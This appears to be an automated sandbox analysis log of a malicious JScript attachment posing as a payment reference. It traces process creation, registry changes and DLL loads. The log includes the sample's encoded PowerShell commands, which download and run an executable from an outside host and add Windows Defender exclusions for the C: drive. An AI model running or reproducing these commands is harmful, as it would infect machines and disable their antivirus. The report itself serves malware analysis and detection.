Source: classification engine Classification label: mal100.rans.bank.troj.spyw.expl.evad.winJS@32/22@10/3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 20_2_00417AD9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_06C888EA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 20_2_06C888EA
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_02FF7B28 GetDiskFreeSpaceA, 14_2_02FF7B28
Source: C:\Users\user\AppData\Local\Temp\loader.exe Code function: 14_2_03007B90 CreateToolhelp32Snapshot, 14_2_03007B90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource, 20_2_0041B9AB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 20_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 20_2_0041AC43
Source: C:\Users\user\AppData\Local\Temp\loader.exe File created: C:\Users\All Users\5058.cmd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe Mutant created: \Sessions\1\BaseNamedObjects\makwin-04NDKU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncizkrmy.r5g.ps1
Source: C:\Users\user\AppData\Local\Temp\loader.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Links\Xdnxwtne.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Payment reference no. - FT910298955674.js Virustotal: Detection: 22%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Payment reference no. - FT910298955674.js" /elevate
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBuAGEAdwBhAHQAYgBzAGMALgBjAG8AbQAvAGYAaQBsAGUALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBsAG8AYQBkAGUAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAcAB1AHQACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\loader.exe "C:\Users\user~1\AppData\Local\Temp\loader.exe"
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\5058.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\39949.cmd""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\loader.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown Process created: C:\Users\user\Links\Xdnxwtne.PIF "C:\Users\user\Links\Xdnxwtne.PIF"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Links\Xdnxwtne.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: url.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: chrome.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ieproxy.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: mssip32.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??????????.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ??l.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ????.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???e???????????.dll
Source: C:\Users\user\AppData\Local\Temp\loader.exe Section loaded: ???e???????????.dll
